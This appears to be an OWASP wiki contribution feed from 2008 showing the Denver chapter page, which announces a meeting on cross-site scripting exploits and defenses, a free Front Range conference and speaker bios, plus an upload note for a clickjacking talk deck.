[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=File:0808_Denver_Clickjacking.zip&diff=44357File:0808 Denver Clickjacking.zip2008-10-22T04:26:13Z<p>Eduprey: Intro to clickjacking deck from OWASP Denver Oct 2008</p>
<hr />
<div>Intro to clickjacking deck from OWASP Denver Oct 2008</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=28826Denver2008-05-03T02:47:31Z<p>Eduprey: </p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:owasp@electricalchemy.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
== Special Event! Front Range OWASP Conference, 10 June 2008! ==<br />
The Denver OWASP Chapter, in conjunction with the Boulder OWASP Chapter, is proud to present the FROC this June. We have an assortment of top notch speakers but have managed to keep this a *free conference*! Please register now at the [http://froc.us FROC website]<br />
<br />
== Next Meeting ==<br />
<br />
'''The next meeting of the DENVER OWASP chapter will be held Wednesday 21 May 2008 at Raytheon Polar Services, 7400 S. Tucson Way, Centennial, CO 80112. [[http://xrl.us/bhyyk gMaps Link]]<br />
<br />
=== Topic: Cross Site Scripting, Exploits and Defenses===<br />
<br />
<br />
Agenda:<br />
<br />
6-6:30 Dinner (at RPSC; provided by [http://www.fishnetsecurity.com/ Fishnet Security].<br />
<br />
6:30 - 6:40 Chapter business<br />
<br />
6:40 - 8:00 Presentation and Q&A<br />
<br />
Following the meeting we will have informal discussions over beverages at a local pub TBD.<br />
<br />
=== '''Speakers''' ===<br />
<br />
Chapter leaders David Campbell and Eric Duprey will be presenting on the up and coming threat of cross site scripting (XSS) vulnerabilities.<br />
<br />
For a long time, the impact of XSS vulnerabilities has been grossly underestimated. During this presentation, we will demonstrate exactly how effective XSS vulns can be. We intend to make this presentation interactive, so bring a laptop and be prepared to join in the fun.<br />
<br />
David Campbell is a ten plus year veteran of the infosec industry, with experience ranging from penetration testing for Fortune-100's to architecting security solutions for large multinational financials to security consulting for US government agencies. DC is presently head of security engineering for Raytheon Polar Services, and is also on the board of directors of Psiframe Inc., a San Francisco based security consultancy. <br />
<br />
Eric Duprey is a Senior Security Engineer for Dish Network Corporation.<br />
<br />
<br />
----<br />
<br />
===Questions, Comments===<br />
Questions can be directed to <br />
*[mailto:dcampbell@owasp.org David Campbell, Denver OWASP] +1 415 377 7379<br />
*[mailto:eduprey@gmail.com Eric Duprey, Denver OWASP]<br />
<br />
== Future Meetings == <br />
[https://www.owasp.org/index.php/Denver#Next_Meeting May 21 2008]<br />
<br />
== Past Meetings ==<br />
<br />
[[Denver April 2008 meeting|April 2008]]<br />
<br />
[[Denver February 2008 meeting|February 2008]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
----<br />
<br />
==Chapter Planning Pages==<br />
[[Front Range Web Application Security Summit Planning Page|Front Range Web Application Security Summit Planning]]</div>Eduprey